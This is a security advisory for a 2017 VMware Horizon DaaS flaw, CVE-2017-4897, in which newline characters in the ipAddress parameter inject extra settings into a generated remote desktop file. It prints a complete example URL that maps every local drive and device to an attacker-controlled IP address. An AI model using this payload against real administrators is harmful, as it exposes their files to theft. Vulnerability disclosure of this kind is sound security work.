VMware Horizon DaaS - Improper IP Address Validation
- CVE(s): VMSA-2017-0002, CVE-2017-4897
- Publish Date: 10 March 2017
- Vendor: VMware
- Product: Horizon Daas Platform
- Version(s) affected: 6.1.x
- Fixed version: 7.0.0
- Author: Ahmad Ashraff
A security advisory was released by the VMware Security Team on the 3rd of March 2017 in their Security Blog.
Improper IP Address Validation (CVE-2017-4897) #
Horizon DaaS allows a creation of a remote desktop connection file through the application. This process only can be performed by a user with administrative privilege. The request will look similar to the following:
<host>/admin/getRdpByIp.action?ipAddress=<ip-address>
However, it was found that the ipAddress
parameter within getRdpByIP
does not properly validate the input supplied by a user. By using newline characters (%0a
) in the parameter, it is possible to include extra settings into the remote desktop connection file, such as drive mapping redirections.
Example:
https://<host>/admin/getRdpByIp.action?ipAddress=<attacker's-ip-address>:3389%0aconnect%20to%20console:i:1%0aadministrative%20session:i:1%0ausername:s:Administrator%0adomain:s:.%0ascreen%20mode%20id:i:2%0ause%20multimon:i:0%0adesktopwidth:i:800%0adesktopheight:i:600%0asession%20bpp:i:32%0awinposstr:s:0,3,0,0,800,600%0acompression:i:1%0akeyboardhook:i:2%0aaudiocapturemode:i:0%0avideoplaybackmode:i:1%0aconnection%20type:i:2%0adisplayconnectionbar:i:1%0adisable%20wallpaper:i:1%0aallow%20font%20smoothing:i:0%0aallow%20desktop%20composition:i:0%0adisable%20full%20window%20drag:i:1%0adisable%20menu%20anims:i:1%0adisable%20themes:i:0%0adisable%20cursor%20setting:i:0%0abitmapcachepersistenable:i:1%0aaudiomode:i:0%0aredirectprinters:i:1%0aredirectcomports:i:1%0aredirectsmartcards:i:1%0aredirectclipboard:i:1%0aredirectposdevices:i:0%0aredirectdirectx:i:1%0adevicestoredirect:s:*%0adrivestoredirect:s:*%0aautoreconnection%20enabled:i:1%0aauthentication%20level:i:2%0aprompt%20for%20credentials:i:0%0anegotiate%20security%20layer:i:1%0aremoteapplicationmode:i:0%0aalternate%20shell:s:%0ashell%20working%20directory:s:%0agatewayhostname:s:%0agatewayusagemethod:i:4%0agatewaycredentialssource:i:4%0agatewayprofileusagemethod:i:0%0apromptcredentialonce:i:1%0ause%20edirection%20server%20name:i:0%0anull</host>
An authenticated administrator that was manipulated into clicking the above URL will receive a remote desktop connection file. Once this file is opened, it will connect to the attacker’s IP address such that their local drive will be mapped to the attacker’s remote desktop server.